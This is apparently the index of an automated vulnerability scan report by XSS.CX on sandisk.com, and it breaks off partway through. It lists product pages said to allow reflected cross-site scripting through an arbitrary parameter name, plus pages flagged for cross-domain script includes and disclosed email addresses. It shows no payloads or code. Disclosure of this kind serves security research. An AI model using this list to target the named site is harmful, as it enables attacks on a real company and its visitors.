Cross Site Scripting Reports | Hoyt LLC Research

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. Cross-site scripting (reflected)

1.1. http://www.sandisk.com/products/camcorder/sandisk-extreme-hd-video-sdhc-cards [name of an arbitrarily supplied request parameter]

1.2. http://www.sandisk.com/products/camcorder/sandisk-video-hd-sdhc [name of an arbitrarily supplied request parameter]

1.3. http://www.sandisk.com/products/computing-products/sandisk-cruzer-blade-usb-flash-drive [name of an arbitrarily supplied request parameter]

1.4. http://www.sandisk.com/products/computing-products/sandisk-solid-state-drive [name of an arbitrarily supplied request parameter]

1.5. http://www.sandisk.com/products/computing-products/sandisk-ultra-backup-usb-flash-drive [name of an arbitrarily supplied request parameter]

1.6. http://www.sandisk.com/products/dslr/sandisk-extreme-compactflash-card [name of an arbitrarily supplied request parameter]

1.7. http://www.sandisk.com/products/dslr/sandisk-extreme-iv-compactflash [name of an arbitrarily supplied request parameter]

1.8. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card [name of an arbitrarily supplied request parameter]

1.9. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card.aspx [name of an arbitrarily supplied request parameter]

1.10. http://www.sandisk.com/products/dslr/sandisk-extreme-sdhc-cards- [name of an arbitrarily supplied request parameter]

1.11. http://www.sandisk.com/products/dslr/sandisk-ultra-compact-flash [name of an arbitrarily supplied request parameter]

1.12. http://www.sandisk.com/products/dslr/sandisk-ultra-ii-compactflash [name of an arbitrarily supplied request parameter]

1.13. http://www.sandisk.com/products/dslr/sandisk-ultra-sdhc [name of an arbitrarily supplied request parameter]

1.14. http://www.sandisk.com/products/dslr/sandisk-ultra-sdxc-cards [name of an arbitrarily supplied request parameter]

1.15. http://www.sandisk.com/products/gaming-cards/sandisk-gaming-compatibility-pack [name of an arbitrarily supplied request parameter]

1.16. http://www.sandisk.com/products/gaming-cards/sandisk-memory-stick-micro-m2 [name of an arbitrarily supplied request parameter]

1.17. http://www.sandisk.com/products/gaming-cards/sandisk-xbox-360-usb-flash-drive [name of an arbitrarily supplied request parameter]

1.18. http://www.sandisk.com/products/imaging/sandisk-extreme-sdhc-cards- [name of an arbitrarily supplied request parameter]

1.19. http://www.sandisk.com/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo [name of an arbitrarily supplied request parameter]

1.20. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2 [name of an arbitrarily supplied request parameter]

1.21. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx [name of an arbitrarily supplied request parameter]

1.22. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc [name of an arbitrarily supplied request parameter]

1.23. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc.aspx [name of an arbitrarily supplied request parameter]

1.24. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc [name of an arbitrarily supplied request parameter]

1.25. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx [name of an arbitrarily supplied request parameter]

1.26. http://www.sandisk.com/products/netbook-cards/sandisk-netbook-sdhc-memory-card [name of an arbitrarily supplied request parameter]

1.27. http://www.sandisk.com/products/readers-accessories/large-memory-card-case [name of an arbitrarily supplied request parameter]

1.28. http://www.sandisk.com/products/readers-accessories/micromate-sdhc [name of an arbitrarily supplied request parameter]

1.29. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-20-usb-readers [name of an arbitrarily supplied request parameter]

1.30. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-firewire-reader [name of an arbitrarily supplied request parameter]

1.31. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter [name of an arbitrarily supplied request parameter]

1.32. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader [name of an arbitrarily supplied request parameter]

1.33. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader [name of an arbitrarily supplied request parameter]

1.34. http://www.sandisk.com/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player [name of an arbitrarily supplied request parameter]

2. Cross-domain script include

2.1. http://www.sandisk.com/

2.2. http://www.sandisk.com/PlayListXML/

2.3. http://www.sandisk.com/SanDisk/US-eStore

2.4. http://www.sandisk.com/SanDisk/facebook

2.5. http://www.sandisk.com/SanDisk/linkedin

2.6. http://www.sandisk.com/SanDisk/rss

2.7. http://www.sandisk.com/SanDisk/twitter

2.8. http://www.sandisk.com/SanDisk/youtube

2.9. http://www.sandisk.com/about-sandisk

2.10. http://www.sandisk.com/about-sandisk.aspx

2.11. http://www.sandisk.com/about-sandisk/

2.12. http://www.sandisk.com/about-sandisk/careers

2.13. http://www.sandisk.com/about-sandisk/careers/

2.14. http://www.sandisk.com/about-sandisk/careers/benefits

2.15. http://www.sandisk.com/about-sandisk/careers/career-opportunities

2.16. http://www.sandisk.com/about-sandisk/careers/employment-practices

2.17. http://www.sandisk.com/about-sandisk/careers/for-new-college-grads

2.18. http://www.sandisk.com/about-sandisk/contact-us

2.19. http://www.sandisk.com/about-sandisk/corporate-social-responsibility

2.20. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/

2.21. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement

2.22. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/

2.23. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/community-education

2.24. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program

2.25. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering

2.26. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/philanthropy

2.27. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility

2.28. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/

2.29. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety

2.30. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics

2.31. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility

2.32. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/

2.33. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system

2.34. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities

2.35. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology

2.36. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance

2.37. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure

2.38. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement

2.39. http://www.sandisk.com/about-sandisk/management

2.40. http://www.sandisk.com/about-sandisk/management/

2.41. http://www.sandisk.com/about-sandisk/management/timeline-of-innovation

2.42. http://www.sandisk.com/about-sandisk/media-kit

2.43. http://www.sandisk.com/about-sandisk/media-kit/

2.44. http://www.sandisk.com/about-sandisk/media-kit/business-and-industry-association-links

2.45. http://www.sandisk.com/about-sandisk/media-kit/businessoem-products-brochures

2.46. http://www.sandisk.com/about-sandisk/media-kit/executive-officer-photos

2.47. http://www.sandisk.com/about-sandisk/media-kit/executive-officer-photos.aspx

2.48. http://www.sandisk.com/about-sandisk/media-kit/miscellaneous

2.49. http://www.sandisk.com/about-sandisk/media-kit/oem-product-photos

2.50. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos

2.51. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/

2.52. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/dslr/

2.53. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx

2.54. http://www.sandisk.com/about-sandisk/media-kit/retail-products-brochures

2.55. http://www.sandisk.com/about-sandisk/media-kit/trademark-information

2.56. http://www.sandisk.com/about-sandisk/press-room

2.57. http://www.sandisk.com/about-sandisk/press-room/press-contacts

2.58. http://www.sandisk.com/about-sandisk/press-room/press-releases

2.59. http://www.sandisk.com/about-sandisk/press-room/press-releases/2009/2009-09-14-sandisk-extreme-pro-compactflash-memory-card-raises-bar-for-professional-grade-performance,-capacity-and-reliability

2.60. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call

2.61. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results

2.62. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony

2.63. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-worldâ??s-smallest-64gb-solid-state-drive

2.64. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-worldã¢â??¬â??¢s-smallest-64gb-solid-state-drive

2.65. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-worldã£â¢ã¢â?šâ¬ã¢â?žâ¢s-smallest-64gb-solid-state-drive

2.66. http://www.sandisk.com/about-sandisk/privacy-policy

2.67. http://www.sandisk.com/about-sandisk/privacy-policy/

2.68. http://www.sandisk.com/about-sandisk/privacy-policy/archived-privacypolicy

2.69. http://www.sandisk.com/about-sandisk/privacy-policy/faq

2.70. http://www.sandisk.com/about-sandisk/procurement--global-supply-base-management

2.71. http://www.sandisk.com/about-sandisk/terms-of-use

2.72. http://www.sandisk.com/about-sandisk/worldwide-locations

2.73. http://www.sandisk.com/about-sandisk/worldwide-locations/

2.74. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk--israel

2.75. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk-asia-pacific

2.76. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk-europe

2.77. http://www.sandisk.com/business-solutions

2.78. http://www.sandisk.com/business-solutions/contact-us

2.79. http://www.sandisk.com/business-solutions/embedded-products

2.80. http://www.sandisk.com/business-solutions/embedded-products.aspx

2.81. http://www.sandisk.com/business-solutions/embedded-products/

2.82. http://www.sandisk.com/business-solutions/embedded-products/inand

2.83. http://www.sandisk.com/business-solutions/find-a-distributor

2.84. http://www.sandisk.com/business-solutions/flash-memory-cards

2.85. http://www.sandisk.com/business-solutions/flash-memory-cards.aspx

2.86. http://www.sandisk.com/business-solutions/flash-memory-cards/

2.87. http://www.sandisk.com/business-solutions/flash-memory-cards/compact-flash-cards

2.88. http://www.sandisk.com/business-solutions/flash-memory-cards/memory-stick-pro-duo

2.89. http://www.sandisk.com/business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards-

2.90. http://www.sandisk.com/business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards

2.91. http://www.sandisk.com/business-solutions/mobile-handset-vendors

2.92. http://www.sandisk.com/business-solutions/mobile-handset-vendors.aspx

2.93. http://www.sandisk.com/business-solutions/mobile-handset-vendors/

2.94. http://www.sandisk.com/business-solutions/mobile-handset-vendors/inand

2.95. http://www.sandisk.com/business-solutions/mobile-handset-vendors/m2

2.96. http://www.sandisk.com/business-solutions/mobile-handset-vendors/m2.aspx

2.97. http://www.sandisk.com/business-solutions/mobile-handset-vendors/microsdhc

2.98. http://www.sandisk.com/business-solutions/mobile-handset-vendors/microsdhc.aspx

2.99. http://www.sandisk.com/business-solutions/mobile-network-operators

2.100. http://www.sandisk.com/business-solutions/mobile-network-operators.aspx

2.101. http://www.sandisk.com/business-solutions/mobile-network-operators/

2.102. http://www.sandisk.com/business-solutions/mobile-network-operators/memory-cards-

2.103. http://www.sandisk.com/business-solutions/mobile-network-operators/memory-cards-.aspx

2.104. http://www.sandisk.com/business-solutions/sd-worm

2.105. http://www.sandisk.com/business-solutions/sd-worm/

2.106. http://www.sandisk.com/business-solutions/sd-worm/benefits

2.107. http://www.sandisk.com/business-solutions/sd-worm/case-studies

2.108. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-card

2.109. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-contact-us

2.110. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-downloads

2.111. http://www.sandisk.com/business-solutions/sd-worm/solutions

2.112. http://www.sandisk.com/business-solutions/ssd

2.113. http://www.sandisk.com/business-solutions/ssd.aspx

2.114. http://www.sandisk.com/business-solutions/ssd/landing

2.115. http://www.sandisk.com/business-solutions/technology

2.116. http://www.sandisk.com/business-solutions/usb-flash-drives

2.117. http://www.sandisk.com/business-solutions/usb-flash-drives.aspx

2.118. http://www.sandisk.com/business-solutions/usb-flash-drives/

2.119. http://www.sandisk.com/business-solutions/usb-flash-drives/clear-case-ufd.aspx

2.120. http://www.sandisk.com/business-solutions/usb-flash-drives/core-module

2.121. http://www.sandisk.com/business-solutions/usb-flash-drives/core-module.aspx

2.122. http://www.sandisk.com/consumer-products

2.123. http://www.sandisk.com/consumer-products/camcorder

2.124. http://www.sandisk.com/consumer-products/camera

2.125. http://www.sandisk.com/consumer-products/computing

2.126. http://www.sandisk.com/consumer-products/computing/

2.127. http://www.sandisk.com/consumer-products/computing/ssd-landing

2.128. http://www.sandisk.com/consumer-products/dslr

2.129. http://www.sandisk.com/consumer-products/gaming

2.130. http://www.sandisk.com/consumer-products/mobile-memory

2.131. http://www.sandisk.com/consumer-products/music-player

2.132. http://www.sandisk.com/css/MediaPlayer_img/

2.133. http://www.sandisk.com/flash/

2.134. http://www.sandisk.com/global-sites

2.135. http://www.sandisk.com/homepage

2.136. http://www.sandisk.com/media/100759/

2.137. http://www.sandisk.com/media/100764/

2.138. http://www.sandisk.com/media/100769/

2.139. http://www.sandisk.com/media/100774/

2.140. http://www.sandisk.com/media/27670/

2.141. http://www.sandisk.com/media/27675/

2.142. http://www.sandisk.com/media/27685/

2.143. http://www.sandisk.com/media/27690/

2.144. http://www.sandisk.com/media/27695/

2.145. http://www.sandisk.com/media/407994/

2.146. http://www.sandisk.com/media/745047/

2.147. http://www.sandisk.com/misc/404error

2.148. http://www.sandisk.com/products/camcorder/sandisk-extreme-hd-video-sdhc-cards

2.149. http://www.sandisk.com/products/camcorder/sandisk-video-hd-sdhc

2.150. http://www.sandisk.com/products/computing-products/sandisk-cruzer-blade-usb-flash-drive

2.151. http://www.sandisk.com/products/computing-products/sandisk-solid-state-drive

2.152. http://www.sandisk.com/products/computing-products/sandisk-ultra-backup-usb-flash-drive

2.153. http://www.sandisk.com/products/dslr/

2.154. http://www.sandisk.com/products/dslr/sandisk-extreme-compactflash-card

2.155. http://www.sandisk.com/products/dslr/sandisk-extreme-iv-compactflash

2.156. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card

2.157. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card.aspx

2.158. http://www.sandisk.com/products/dslr/sandisk-extreme-sdhc-cards-

2.159. http://www.sandisk.com/products/dslr/sandisk-ultra-compact-flash

2.160. http://www.sandisk.com/products/dslr/sandisk-ultra-ii-compactflash

2.161. http://www.sandisk.com/products/dslr/sandisk-ultra-sdhc

2.162. http://www.sandisk.com/products/dslr/sandisk-ultra-sdxc-cards

2.163. http://www.sandisk.com/products/gaming-cards/sandisk-gaming-compatibility-pack

2.164. http://www.sandisk.com/products/gaming-cards/sandisk-memory-stick-micro-m2

2.165. http://www.sandisk.com/products/gaming-cards/sandisk-xbox-360-usb-flash-drive

2.166. http://www.sandisk.com/products/imaging/sandisk-extreme-sdhc-cards-

2.167. http://www.sandisk.com/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo

2.168. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2

2.169. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx

2.170. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc

2.171. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc.aspx

2.172. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc

2.173. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx

2.174. http://www.sandisk.com/products/netbook-cards/sandisk-netbook-sdhc-memory-card

2.175. http://www.sandisk.com/products/readers-accessories

2.176. http://www.sandisk.com/products/readers-accessories/large-memory-card-case

2.177. http://www.sandisk.com/products/readers-accessories/micromate-sdhc

2.178. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-20-usb-readers

2.179. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-firewire-reader

2.180. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter

2.181. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader

2.182. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader

2.183. http://www.sandisk.com/products/readers-accessories/sandisk®-mobilemate?-duo

2.184. http://www.sandisk.com/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player

2.185. http://www.sandisk.com/products/slotradioproducts/sansaplayers-cards/card-vh1-classic

2.186. http://www.sandisk.com/sandisk-rss

2.187. http://www.sandisk.com/sandisk-rss.aspx

2.188. http://www.sandisk.com/sandisk-support/contact-us

2.189. http://www.sandisk.com/sandisk-support/driver-download-wizard

2.190. http://www.sandisk.com/sandisk-support/where-to-buy

2.191. http://www.sandisk.com/sitemap

3. Email addresses disclosed

3.1. http://www.sandisk.com/

3.2. http://www.sandisk.com/PlayListXML/

3.3. http://www.sandisk.com/SanDisk/US-eStore

3.4. http://www.sandisk.com/SanDisk/facebook

3.5. http://www.sandisk.com/SanDisk/linkedin

3.6. http://www.sandisk.com/SanDisk/rss

3.7. http://www.sandisk.com/SanDisk/twitter

3.8. http://www.sandisk.com/SanDisk/youtube

3.9. http://www.sandisk.com/about-sandisk

3.10. http://www.sandisk.com/about-sandisk.aspx

3.11. http://www.sandisk.com/about-sandisk/

3.12. http://www.sandisk.com/about-sandisk/careers

3.13. http://www.sandisk.com/about-sandisk/careers/

3.14. http://www.sandisk.com/about-sandisk/careers/benefits

3.15. http://www.sandisk.com/about-sandisk/careers/career-opportunities

3.16. http://www.sandisk.com/about-sandisk/careers/employment-practices

3.17. http://www.sandisk.com/about-sandisk/careers/for-new-college-grads

3.18. http://www.sandisk.com/about-sandisk/contact-us

3.19. http://www.sandisk.com/about-sandisk/corporate-social-responsibility

3.20. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/

3.21. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement

3.22. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/

3.23. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/community-education

3.24. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program

3.25. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering

3.26. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/philanthropy

3.27. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility

3.28. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/

3.29. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety

3.30. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics

3.31. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility

3.32. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/

3.33. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system

3.34. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities

3.35. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology

3.36. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance

3.37. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure

3.38. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement

3.39. http://www.sandisk.com/about-sandisk/management

3.40. http://www.sandisk.com/about-sandisk/management/

3.41. http://www.sandisk.com/about-sandisk/management/timeline-of-innovation

3.42. http://www.sandisk.com/about-sandisk/media-kit

3.43. http://www.sandisk.com/about-sandisk/media-kit/

3.44. http://www.sandisk.com/about-sandisk/media-kit/business-and-industry-association-links

3.45. http://www.sandisk.com/about-sandisk/media-kit/businessoem-products-brochures

3.46. http://www.sandisk.com/about-sandisk/media-kit/executive-officer-photos

3.47. http://www.sandisk.com/about-sandisk/media-kit/executive-officer-photos.aspx

3.48. http://www.sandisk.com/about-sandisk/media-kit/miscellaneous

3.49. http://www.sandisk.com/about-sandisk/media-kit/oem-product-photos

3.50. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos

3.51. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/

3.52. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/dslr/

3.53. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx

3.54. http://www.sandisk.com/about-sandisk/media-kit/retail-products-brochures

3.55. http://www.sandisk.com/about-sandisk/media-kit/trademark-information

3.56. http://www.sandisk.com/about-sandisk/press-room

3.57. http://www.sandisk.com/about-sandisk/press-room/press-contacts

3.58. http://www.sandisk.com/about-sandisk/press-room/press-releases

3.59. http://www.sandisk.com/about-sandisk/press-room/press-releases/2009/2009-09-14-sandisk-extreme-pro-compactflash-memory-card-raises-bar-for-professional-grade-performance,-capacity-and-reliability

3.60. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call

3.61. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results

3.62. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony

3.63. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-worldâ??s-smallest-64gb-solid-state-drive

3.64. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-worldã¢â??¬â??¢s-smallest-64gb-solid-state-drive

3.65. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-worldã£â¢ã¢â?šâ¬ã¢â?žâ¢s-smallest-64gb-solid-state-drive

3.66. http://www.sandisk.com/about-sandisk/privacy-policy

3.67. http://www.sandisk.com/about-sandisk/privacy-policy/

3.68. http://www.sandisk.com/about-sandisk/privacy-policy/archived-privacypolicy

3.69. http://www.sandisk.com/about-sandisk/privacy-policy/faq

3.70. http://www.sandisk.com/about-sandisk/procurement--global-supply-base-management

3.71. http://www.sandisk.com/about-sandisk/terms-of-use

3.72. http://www.sandisk.com/about-sandisk/worldwide-locations

3.73. http://www.sandisk.com/about-sandisk/worldwide-locations/

3.74. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk--israel

3.75. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk-asia-pacific

3.76. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk-europe

3.77. http://www.sandisk.com/business-solutions

3.78. http://www.sandisk.com/business-solutions/contact-us

3.79. http://www.sandisk.com/business-solutions/embedded-products

3.80. http://www.sandisk.com/business-solutions/embedded-products.aspx

3.81. http://www.sandisk.com/business-solutions/embedded-products/

3.82. http://www.sandisk.com/business-solutions/embedded-products/inand

3.83. http://www.sandisk.com/business-solutions/find-a-distributor

3.84. http://www.sandisk.com/business-solutions/flash-memory-cards

3.85. http://www.sandisk.com/business-solutions/flash-memory-cards.aspx

3.86. http://www.sandisk.com/business-solutions/flash-memory-cards/

3.87. http://www.sandisk.com/business-solutions/flash-memory-cards/compact-flash-cards

3.88. http://www.sandisk.com/business-solutions/flash-memory-cards/memory-stick-pro-duo

3.89. http://www.sandisk.com/business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards-

3.90. http://www.sandisk.com/business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards

3.91. http://www.sandisk.com/business-solutions/mobile-handset-vendors

3.92. http://www.sandisk.com/business-solutions/mobile-handset-vendors.aspx

3.93. http://www.sandisk.com/business-solutions/mobile-handset-vendors/

3.94. http://www.sandisk.com/business-solutions/mobile-handset-vendors/inand

3.95. http://www.sandisk.com/business-solutions/mobile-handset-vendors/m2

3.96. http://www.sandisk.com/business-solutions/mobile-handset-vendors/m2.aspx

3.97. http://www.sandisk.com/business-solutions/mobile-handset-vendors/microsdhc

3.98. http://www.sandisk.com/business-solutions/mobile-handset-vendors/microsdhc.aspx

3.99. http://www.sandisk.com/business-solutions/mobile-network-operators

3.100. http://www.sandisk.com/business-solutions/mobile-network-operators.aspx

3.101. http://www.sandisk.com/business-solutions/mobile-network-operators/

3.102. http://www.sandisk.com/business-solutions/mobile-network-operators/memory-cards-

3.103. http://www.sandisk.com/business-solutions/mobile-network-operators/memory-cards-.aspx

3.104. http://www.sandisk.com/business-solutions/sd-worm

3.105. http://www.sandisk.com/business-solutions/sd-worm/

3.106. http://www.sandisk.com/business-solutions/sd-worm/benefits

3.107. http://www.sandisk.com/business-solutions/sd-worm/case-studies

3.108. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-card

3.109. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-contact-us

3.110. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-downloads

3.111. http://www.sandisk.com/business-solutions/sd-worm/solutions

3.112. http://www.sandisk.com/business-solutions/ssd

3.113. http://www.sandisk.com/business-solutions/ssd.aspx

3.114. http://www.sandisk.com/business-solutions/ssd/landing

3.115. http://www.sandisk.com/business-solutions/technology

3.116. http://www.sandisk.com/business-solutions/usb-flash-drives

3.117. http://www.sandisk.com/business-solutions/usb-flash-drives.aspx

3.118. http://www.sandisk.com/business-solutions/usb-flash-drives/

3.119. http://www.sandisk.com/business-solutions/usb-flash-drives/clear-case-ufd.aspx

3.120. http://www.sandisk.com/business-solutions/usb-flash-drives/core-module

3.121. http://www.sandisk.com/business-solutions/usb-flash-drives/core-module.aspx

3.122. http://www.sandisk.com/consumer-products

3.123. http://www.sandisk.com/consumer-products/camcorder

3.124. http://www.sandisk.com/consumer-products/camera

3.125. http://www.sandisk.com/consumer-products/computing

3.126. http://www.sandisk.com/consumer-products/computing/

3.127. http://www.sandisk.com/consumer-products/computing/ssd-landing

3.128. http://www.sandisk.com/consumer-products/dslr

3.129. http://www.sandisk.com/consumer-products/gaming

3.130. http://www.sandisk.com/consumer-products/mobile-memory

3.131. http://www.sandisk.com/consumer-products/music-player

3.132. http://www.sandisk.com/css/MediaPlayer_img/

3.133. http://www.sandisk.com/flash/

3.134. http://www.sandisk.com/global-sites

3.135. http://www.sandisk.com/homepage

3.136. http://www.sandisk.com/media/100759/

3.137. http://www.sandisk.com/media/100764/

3.138. http://www.sandisk.com/media/100769/

3.139. http://www.sandisk.com/media/100774/

3.140. http://www.sandisk.com/media/27670/

3.141. http://www.sandisk.com/media/27675/

3.142. http://www.sandisk.com/media/27685/

3.143. http://www.sandisk.com/media/27690/

3.144. http://www.sandisk.com/media/27695/

3.145. http://www.sandisk.com/media/407994/

3.146. http://www.sandisk.com/media/745047/

3.147. http://www.sandisk.com/misc/404error

3.148. http://www.sandisk.com/products/camcorder/sandisk-extreme-hd-video-sdhc-cards

3.149. http://www.sandisk.com/products/camcorder/sandisk-video-hd-sdhc

3.150. http://www.sandisk.com/products/computing-products/sandisk-cruzer-blade-usb-flash-drive

3.151. http://www.sandisk.com/products/computing-products/sandisk-solid-state-drive

3.152. http://www.sandisk.com/products/computing-products/sandisk-ultra-backup-usb-flash-drive

3.153. http://www.sandisk.com/products/dslr/

3.154. http://www.sandisk.com/products/dslr/sandisk-extreme-compactflash-card

3.155. http://www.sandisk.com/products/dslr/sandisk-extreme-iv-compactflash

3.156. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card

3.157. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card.aspx

3.158. http://www.sandisk.com/products/dslr/sandisk-extreme-sdhc-cards-

3.159. http://www.sandisk.com/products/dslr/sandisk-ultra-compact-flash

3.160. http://www.sandisk.com/products/dslr/sandisk-ultra-ii-compactflash

3.161. http://www.sandisk.com/products/dslr/sandisk-ultra-sdhc

3.162. http://www.sandisk.com/products/dslr/sandisk-ultra-sdxc-cards

3.163. http://www.sandisk.com/products/gaming-cards/sandisk-gaming-compatibility-pack

3.164. http://www.sandisk.com/products/gaming-cards/sandisk-memory-stick-micro-m2

3.165. http://www.sandisk.com/products/gaming-cards/sandisk-xbox-360-usb-flash-drive

3.166. http://www.sandisk.com/products/imaging/sandisk-extreme-sdhc-cards-

3.167. http://www.sandisk.com/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo

3.168. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2

3.169. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx

3.170. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc

